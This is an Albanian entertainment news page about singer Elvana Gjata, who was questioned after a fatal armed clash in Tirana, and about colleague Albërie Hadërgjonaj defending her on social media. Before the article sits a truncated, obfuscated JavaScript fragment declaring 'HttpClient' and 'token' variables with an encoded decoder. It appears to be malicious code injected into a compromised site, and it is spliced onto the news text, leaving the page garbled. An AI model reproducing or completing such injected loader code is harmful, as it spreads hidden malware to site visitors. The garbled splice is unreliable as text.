;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Publiku e “linçoi” pas ndodhisë në Tiranë, Albërie Hadërgjonaj i del në mbrojtje Elvana Gjatës

By

E premtja gdhiu me dhjetëra lajme në mediat shqiptare, se këngëtarja Elvana Gjata ishte përfshirë në një konflikt të armatosur, nga ku mbeti një i vrarë.

Ngjarja që tronditi Shqipërinë ndodhi tek ish Blloku në Tiranë, e më pas u raportua se Gjata ishte marrë në pyetje nga prokuroria sepse ishte e pranishme në momentin që ndodhi ngjarja dhe se edhe i fejuari i saj Ervin Mataj, bënte pjesë në palët e konfliktuara.

Pas kësaj ngjarjeje, Gjata u linçua nga publiku dhe u detyrua t’i bllokonte komentet në Instagram derisa ka raportime se këngëtarja është larguar nga Shqipëria.

Në mbrojtje të këngëtares, ka dalë këngëtarja e saj kolege Albërie Hadërgjonaj e cila i ka quajtur “hiena” ata që po e sulmojnë këngëtaren.

“Kjo është Elvana. Të tjerat janë vrer i “hijenave të rrjeteve sociale”, ka shkruar këngëtarja Hadërgjonaj. /Prive.al

 

Artikuj të ngjashëm